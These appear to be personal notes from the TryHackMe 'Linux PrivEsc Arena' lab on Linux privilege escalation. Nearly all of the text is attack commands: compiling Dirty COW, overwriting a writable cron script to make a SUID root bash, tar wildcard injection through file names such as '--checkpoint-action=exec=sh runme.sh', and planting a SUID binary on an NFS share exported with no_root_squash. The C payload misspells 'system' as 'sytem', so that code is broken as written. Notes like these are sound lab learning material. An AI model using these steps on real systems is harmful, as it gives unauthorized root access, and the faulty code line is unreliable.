TryHackMe | Linux PrivEsc Arena
<aside> 📌 Summary
</aside>
gcc -pthread c0w.c -o cow
dirty cow will replace passwd to another application that makes us root.
Vulnerable cron job at a readable path. Let's create a bash with SUID to make us root.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
chmod +x /home/user/overwrite.sh
In our case, a job with a wild card run every minute, it makes a backup of all the user folder. The wildcard allows us to inject some malicious code to make the job create a root bash.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
chmod +x /home/user/runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\\ runme.sh
cat /etc/exports
# look for "no_root_squash"
Then on the attacker machine, we can mount the folder and create malicious code.
showmount -e <ip>
mkdir /tmp/mountme
mount -o rw,vers=2 <ip>:/<folder> /tmp/mountme
echo 'int main() {setgid(0); setuid(0); sytem("/bin/bash"); return 0;}' > /tmp/mountme/x.c
gcc /tmp/mountme/x.c -o /tmp/mountme/x
chmod +s /tmp/mountme/x